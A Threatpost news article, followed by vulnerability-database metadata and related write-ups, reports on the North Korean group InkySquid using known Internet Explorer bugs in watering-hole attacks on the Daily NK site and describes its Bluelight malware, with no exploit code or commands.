InkySquid State Actor Exploiting Known IE Bugs

2021-08-19T20:19:04

Description

The InkySquid advanced persistent threat (APT) group, which researchers have linked to the North Korean government, was caught launching watering hole attacks against a South Korean newspaper using known Internet Explorer vulnerabilities. New analysis from Volexity reported its team of researchers noticed [suspicious code being loaded](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) on the Daily NK site, a news outlet focused on North Korea, starting in April. And although the links led to real files, malicious code was being inserted for brief periods, making it difficult to detect. The researchers suspected the attack was ongoing between March and June. “When requested, with the correct Internet Explorer user-agent, this host would serve additional obfuscated JavaScript code,” Volexity’s team reported. “As with the initial redirect, the attacker chose to bury their malicious code amongst legitimate code. In this case, the attacker used the ‘bPopUp’ JavaScript library alongside their own code.” [![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>) The researchers added that since the code is largely legitimate, it would likely evade both manual and [automated detection](<https://threatpost.com/security-risks-cloud/168754/>). The code, which the attackers camouflage around real content, is consistent with Internet Explorer bug CVE-2020-1380, the report said. Another similar attack from the InkySquid group (aka APT37, Reaper or ScarCruft) leveraged CVE-2021-26411 to [attack Internet Explorer](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) as well as legacy versions of Microsoft Edge, according to Volexity. “As with the CVE-2020-1380 example, the attacker made use of encoded content stored in SVG tags to store both key strings and their initial payload,” the researchers explained. “The initial command-and-control (C2) URLs were the same as those observed in the CVE-2020-1380 case.” ## **InkySquid’s Bluelight Malware ** The group has also developed a new [malware family](<https://threatpost.com/malware-makers-using-exotic-programming-languages/168117/>) that the report calls “Bluelight” — a name that was chosen because the word “bluelight” was used in the malware’s program database (PDB) code. Cobalt Strike was used to initiate all three of these attacks, the report said. Bluelight appears to be delivered as a secondary payload. “The Bluelight malware family uses different cloud providers to facilitate C2,” the report said. “This specific sample leveraged the Microsoft Graph API for its C2 operations. Upon start-up, Bluelight performs an OAuth2 token authentication using hard-coded parameters.” After authentication, the malware creates a folder in the OneDrive subdirectory, which is controlled by a C2 server, Volexity observed, with innocuous-sounding names like “logo,” “normal,” background,” “theme” and “round.” Then it sets about exfiltrating data, including username, IP addresses, running VM tools on the machine, OS version and more, formatted as a JSON (JavaScript Object Notation), the team explained. “The main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds,” the report said. “For the first five minutes, each iteration will capture a screenshot of the display and upload it to the ‘normal’ subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes.” While leveraging known IE bugs won’t work on a wide swath of targets, once a system is infected detection is difficult thanks to the use of legit code as cover. “While strategic web compromises (SWCs) are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,” the report said.

{"id": "THREATPOST:62A15BEBBD95FBF8704B78058BF030F1", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "InkySquid State Actor Exploiting Known IE Bugs", "description": "The InkySquid advanced persistent threat (APT) group, which researchers have linked to the North Korean government, was caught launching watering hole attacks against a South Korean newspaper using known Internet Explorer vulnerabilities.\n\nNew analysis from Volexity reported its team of researchers noticed [suspicious code being loaded](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) on the Daily NK site, a news outlet focused on North Korea, starting in April. And although the links led to real files, malicious code was being inserted for brief periods, making it difficult to detect. The researchers suspected the attack was ongoing between March and June.\n\n\u201cWhen requested, with the correct Internet Explorer user-agent, this host would serve additional obfuscated JavaScript code,\u201d Volexity\u2019s team reported. \u201cAs with the initial redirect, the attacker chose to bury their malicious code amongst legitimate code. In this case, the attacker used the \u2018bPopUp\u2019 JavaScript library alongside their own code.\u201d\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe researchers added that since the code is largely legitimate, it would likely evade both manual and [automated detection](<https://threatpost.com/security-risks-cloud/168754/>). The code, which the attackers camouflage around real content, is consistent with Internet Explorer bug CVE-2020-1380, the report said.\n\nAnother similar attack from the InkySquid group (aka APT37, Reaper or ScarCruft) leveraged CVE-2021-26411 to [attack Internet Explorer](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) as well as legacy versions of Microsoft Edge, according to Volexity.\n\n\u201cAs with the CVE-2020-1380 example, the attacker made use of encoded content stored in SVG tags to store both key strings and their initial payload,\u201d the researchers explained. \u201cThe initial command-and-control (C2) URLs were the same as those observed in the CVE-2020-1380 case.\u201d\n\n## **InkySquid\u2019s Bluelight Malware **\n\nThe group has also developed a new [malware family](<https://threatpost.com/malware-makers-using-exotic-programming-languages/168117/>) that the report calls \u201cBluelight\u201d \u2014 a name that was chosen because the word \u201cbluelight\u201d was used in the malware\u2019s program database (PDB) code.\n\nCobalt Strike was used to initiate all three of these attacks, the report said. Bluelight appears to be delivered as a secondary payload.\n\n\u201cThe Bluelight malware family uses different cloud providers to facilitate C2,\u201d the report said. \u201cThis specific sample leveraged the Microsoft Graph API for its C2 operations. Upon start-up, Bluelight performs an OAuth2 token authentication using hard-coded parameters.\u201d\n\nAfter authentication, the malware creates a folder in the OneDrive subdirectory, which is controlled by a C2 server, Volexity observed, with innocuous-sounding names like \u201clogo,\u201d \u201cnormal,\u201d background,\u201d \u201ctheme\u201d and \u201cround.\u201d\n\nThen it sets about exfiltrating data, including username, IP addresses, running VM tools on the machine, OS version and more, formatted as a JSON (JavaScript Object Notation), the team explained.\n\n\u201cThe main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds,\u201d the report said. \u201cFor the first five minutes, each iteration will capture a screenshot of the display and upload it to the \u2018normal\u2019 subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes.\u201d\n\nWhile leveraging known IE bugs won\u2019t work on a wide swath of targets, once a system is infected detection is difficult thanks to the use of legit code as cover.\n\n\u201cWhile strategic web compromises (SWCs) are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,\u201d the report said.\n", "published": "2021-08-19T20:19:04", "modified": "2021-08-19T20:19:04", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.6, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 4.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, "href": "https://threatpost.com/inkysquid-exploiting-ie-bugs/168833/", "reporter": "Becky Bracken", "references": ["https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/", "https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/", "https://threatpost.com/security-risks-cloud/168754/", "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "https://threatpost.com/malware-makers-using-exotic-programming-languages/168117/"], "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "immutableFields": [], "lastseen": "2021-08-19T20:34:03", "viewCount": 45, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2F48FB8A-EF4C-468F-9F4F-8BB9BB5FEC97", "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:F65CF017-1855-42E3-9922-BF6F9F078DD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0727", "CPAI-2021-0108"]}, {"type": "cisa", "idList": ["CISA:41E2EC8FEF1331C724A39C3DCCFB0834"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2020-1380", "CISA-KEV-CVE-2021-26411"]}, {"type": "cve", "idList": ["CVE-2020-1380", "CVE-2020-1555", "CVE-2020-1570", "CVE-2021-26411"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA11935", "KLA12108", "KLA12112"]}, {"type": "krebs", "idList": ["KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:232C556149FB9AC828C416ADCCF93766"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1380", "MS:CVE-2021-26411"]}, {"type": "mskb", "idList": ["KB5000800", "KB5000803", "KB5000809", "KB5000822", "KB5000844", "KB5000848"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4565351.NASL", "SMB_NT_MS20_AUG_4566782.NASL", "SMB_NT_MS20_AUG_4571692.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571709.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_AUG_4571741.NASL", "SMB_NT_MS20_AUG_INTERNET_EXPLORER.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "SMB_NT_MS21_MAR_5000803.NASL", "SMB_NT_MS21_MAR_5000807.NASL", "SMB_NT_MS21_MAR_5000808.NASL", "SMB_NT_MS21_MAR_5000809.NASL", "SMB_NT_MS21_MAR_5000822.NASL", "SMB_NT_MS21_MAR_5000841.NASL", "SMB_NT_MS21_MAR_5000844.NASL", "SMB_NT_MS21_MAR_5000847.NASL", "SMB_NT_MS21_MAR_5000848.NASL", "SMB_NT_MS21_MAR_INTERNET_EXPLORER.NASL", "SMB_NT_MS21_MAY_INTERNET_EXPLORER.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:22507355C87630C1D3B720E2ED98701A", "QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "securelist", "idList": ["SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:0EBBF876A406C3077C85D0DC9EF01199", "THN:27562A9FDA5CEBF33FAC792C73F4B06E", "THN:35964D30086BA86E15030F5A7D404BE6", "THN:4225CEE6D7775276254C20B6E19126AE", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3", "THN:DE791A2DD37FD88B59147561CF1F7BBF", "THN:FA6A50184463DFCD20073D5EDD0F36F2"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:197A12EF32429D29CF6A84B11763834D", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0DBE764152C4FE9188A88545FADFB00"]}]}, "score": {"value": -0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:F65CF017-1855-42E3-9922-BF6F9F078DD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0727", "CPAI-2021-0108"]}, {"type": "cisa", "idList": ["CISA:41E2EC8FEF1331C724A39C3DCCFB0834"]}, {"type": "cve", "idList": ["CVE-2020-1380", "CVE-2021-26411"]}, {"type": "githubexploit", "idList": ["C52C407D-E664-5756-BF78-38973532667A"]}, {"type": "kaspersky", "idList": ["KLA11935"]}, {"type": "krebs", "idList": ["KREBS:83CB7FE17AB0EB62BC1947A917C7546C", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:232C556149FB9AC828C416ADCCF93766"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1380", "MS:CVE-2021-26411"]}, {"type": "mskb", "idList": ["KB5000800", "KB5000809"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4565351.NASL", "SMB_NT_MS20_AUG_4566782.NASL", "SMB_NT_MS20_AUG_4571692.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571709.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_AUG_4571741.NASL", "SMB_NT_MS20_AUG_INTERNET_EXPLORER.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:22507355C87630C1D3B720E2ED98701A", "QUALYSBLOG:B847D61CCF30D86B3C35C9E4CA764114"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "securelist", "idList": ["SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D"]}, {"type": "thn", "idList": ["THN:0A61A90DD0F88453854B73FE249BC379", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:BE0D8117CAD7D5DE97C405935DA09BC3"]}, {"type": "threatpost", "idList": ["THREATPOST:050A36E6453D4472A2734DA342E95366", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:197A12EF32429D29CF6A84B11763834D", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E0DBE764152C4FE9188A88545FADFB00"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-1380", "epss": "0.323640000", "percentile": "0.963140000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26411", "epss": "0.964250000", "percentile": "0.992420000", "modified": "2023-03-17"}], "vulnersScore": -0.6}, "_state": {"dependencies": 1678920471, "score": 1684008354, "epss": 1679109163}, "_internal": {"score_hash": "c9a07e8ac899bb9bfcdc6fcaa6e00543"}}

{"attackerkb": [{"lastseen": "2023-06-06T15:10:08", "description": "Internet Explorer Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 1:20pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\n**gwillcox-r7** at March 11, 2021 5:57pm UTC reported:\n\nThere is now [public threat intelligence](<https://twitter.com/jeromesegura/status/1378584985792180227>) that the Purple Fox exploit kit has incorporated this vulnerability and is [exploiting it](<https://twitter.com/nao_sec/status/1378546891349106692>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26411", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26411"], "modified": "2021-03-18T00:00:00", "id": "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "href": "https://attackerkb.com/topics/WZgkdqe2vN/cve-2021-26411", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T00:10:33", "description": "Scripting Engine Memory Corruption Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 14, 2021 10:33am UTC reported:\n\n## Details\n\nThe vulnerability affects Internet Explorer 11 on all Windows Versions. It is located in the `jscript9.dll` library, which is used to execute javascript.\n\nPossible attack vectors:\n\n * website content \n\n * activeX components in office documents \n\n\nGoogle Project Zero released a PoC on 13.05.2021, which triggers the vulnerability and causes a crash. At the time of writing I could not find any weaponized exploit.\n\nThe CVSS rating of the vulnerability differs between Windows desktop versions and server versions. In server versions the CVSS _Privileges Required_ is set to _High_. Desktop versions are rated with CVSS _None_. The reason could be, that IE _enhanced protection mode_ is disabled on Windows desktop versions and enabled on server versions by default.\n\n## Rating explanation\n\nMy rating of the exploitability score was affected by the availability of the PoC and the Microsoft exploitability rating. In year 2020, Operation PowerFall was using a similar vulnerability (CVE-2020-1380) in IE. I expect to see exploits for CVE-2021-26419 in a similar context.\n\nAttackers might gain direct control over the host after exploitation without a sandbox escape. IE 11 does have a _enhanced protected mode (EPM)_, which runs IE in an AppContainer and acts as a sandbox. EPM was introduced with Windows 8 and is disabled by default on Windows desktop versions.\n\n## Sources\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26419> \n\n * <https://threatpost.com/wormable-windows-bug-dos-rce/166057/> \n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=2157> \n\n * <https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/> \n\n * <https://securityintelligence.com/internet-explorer-ie-10-enhanced-protected-mode-epm-sandbox-research/> \n\n * <https://docs.microsoft.com/en-us/troubleshoot/browsers/enhanced-protected-mode-add-on-compatibility>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-26419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2021-26419"], "modified": "2023-08-02T00:00:00", "id": "AKB:2F48FB8A-EF4C-468F-9F4F-8BB9BB5FEC97", "href": "https://attackerkb.com/topics/3ko2JYsW6g/cve-2021-26419", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T01:49:17", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \u2018Scripting Engine Memory Corruption Vulnerability\u2019. This CVE ID is unique from CVE-2020-1555, CVE-2020-1570.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at August 11, 2020 10:53pm UTC reported:\n\nUpdate: Reported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nTLDR: Originally this was written as a low priority issue, however after further discussions internally we are upping the risk due to the fact that IE 11 is installed on every Windows computer and cannot be removed (as it is an OS component), and the fact that there still remains the risk of attack via social engineering, which could get around many of the originally proposed mitigations.\n\nOriginally I wrote this as a low priority issue, however after looking into it more I\u2019m upping the risk on this as IE 11 is installed by default on every Windows system and it cannot be removed, which means that with some social engineering, its possible to compromise any Windows user\u2019s computer. Above all else this factor should be kept in mind as it means that even if an organization doesn\u2019t have IE set as its default, all it takes is a user who is convinced that to download some info they require they need to use IE instead of Firefox, and a malicious website, and attackers will start to have a foothold within the network.\n\nNow what are some of the limiting factors here? Well you can\u2019t uninstall IE, as it is integrated into every Windows operating system and is considered an OS component. This explains the point above as to why this vulnerability really does affect pretty much every single Windows user. However if organizations implement policies or protections that block IE from being run, then users will not be able to open IE and therefore trigger the vulnerability.\n\nThe other point to note is that according to <https://gs.statcounter.com/browser-market-share>, only 1.28% of people use IE these days, compared to 65.89% of people that use Chrome. The closest competitor there is Safari at a little over 16%. This means that this vulnerability is likely to be more of a risk to enterprises where IE use is more likely due to the prevalence of legacy systems and software, and is unlikely to affect the average home user.\n\nHowever, keep in mind that particularly in the government space, there are many organizations that still use IE by default or which require users to interact with their legacy applications using IE (due to compatibility issues or similar). These organizations need to patch this issue as soon as possible as all it takes to exploit this issue is one user browsing to a site with a malicious advertisement or one user clicking a link in a malicious email for that user to be compromised.\n\nFor those that are not using IE by default this issue will be slightly less of a risk due to the need for attackers to conduct social engineering attacks against end users to convince them to load a malicious site in IE, however remember that all it takes is one user clicking on a link for attackers to start gaining a deeper foothold into your network. Even if the social engineering attack only nets a 10% success rate, if your targeting an organization of 1000 users, that\u2019s 100 users that are now compromised, all of which could provide an attacker with unique possibilities to escalate their privileges within your network.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-1380", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380", "CVE-2020-1555", "CVE-2020-1570"], "modified": "2020-08-28T00:00:00", "id": "AKB:F65CF017-1855-42E3-9922-BF6F9F078DD9", "href": "https://attackerkb.com/topics/RZT1LsdXnm/cve-2020-1380", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:13", "description": "[![Malware](https://thehackernews.com/images/-QrNW2pGZsXM/YRzFeUzLNRI/AAAAAAAADkA/5jruQy-AgDkRdhW-7PzZoHP3-W90X5EowCLcBGAsYHQ/s728-e1000/north-korea.jpg)](<https://thehackernews.com/images/-QrNW2pGZsXM/YRzFeUzLNRI/AAAAAAAADkA/5jruQy-AgDkRdhW-7PzZoHP3-W90X5EowCLcBGAsYHQ/s0/north-korea.jpg>)\n\nA North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise (SWC) targeting a South Korean online newspaper.\n\nCybersecurity firm Volexity [attributed](<https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/>) the watering hole attacks to a threat actor it tracks as InkySquid, and more widely known by the monikers ScarCruft and APT37. Daily NK, the publication in question, is said to have hosted the malicious code from at least late March 2021 until early June 2021.\n\nThe \"clever disguise of exploit code amongst legitimate code\" and the use of custom malware enables the attackers to avoid detection, Volexity researchers said.\n\nThe attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in [August 2020](<https://thehackernews.com/2020/08/microsoft-software-patches.html>) and [March 2021](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>). Successful exploitation resulted in the deployment of a Cobalt Strike stager and novel backdoor called BLUELIGHT. \n\n * [CVE-2020-1380](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2020-1380>) (CVSS score: 7.5) - Scripting Engine Memory Corruption Vulnerability\n * [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) (CVSS score: 8.8) - Internet Explorer Memory Corruption Vulnerability\n\nIt's worth noting that both the flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.\n\n[![](https://thehackernews.com/images/-E1lELfCsvpg/YRzEM-DMMLI/AAAAAAAADj4/gtN3LyfaO0MLnrYMwpl1LkoMvGFkm1TXACLcBGAsYHQ/s0/exploit.jpg)](<https://thehackernews.com/images/-E1lELfCsvpg/YRzEM-DMMLI/AAAAAAAADj4/gtN3LyfaO0MLnrYMwpl1LkoMvGFkm1TXACLcBGAsYHQ/s0/exploit.jpg>)\n\nIn a [separate set of attacks](<https://thehackernews.com/2021/07/hackers-exploit-microsoft-browser-bug.html>) disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan (RAT) on compromised Windows systems.\n\nBLUELIGHT is used as a secondary payload following the successful delivery of Cobalt Strike, functioning as a full-featured remote access tool that provides complete access to a compromised system.\n\nIn addition to gathering system metadata and information about installed antivirus products, the malware is capable of executing shellcode, harvesting cookies and passwords from Internet Explorer, Microsoft Edge, and Google Chrome browsers, collecting files and downloading arbitrary executables, the results of which are exfiltrated to a remote server.\n\n\"While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers,\" the researchers noted. \"The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-18T08:33:00", "type": "thn", "title": "NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", 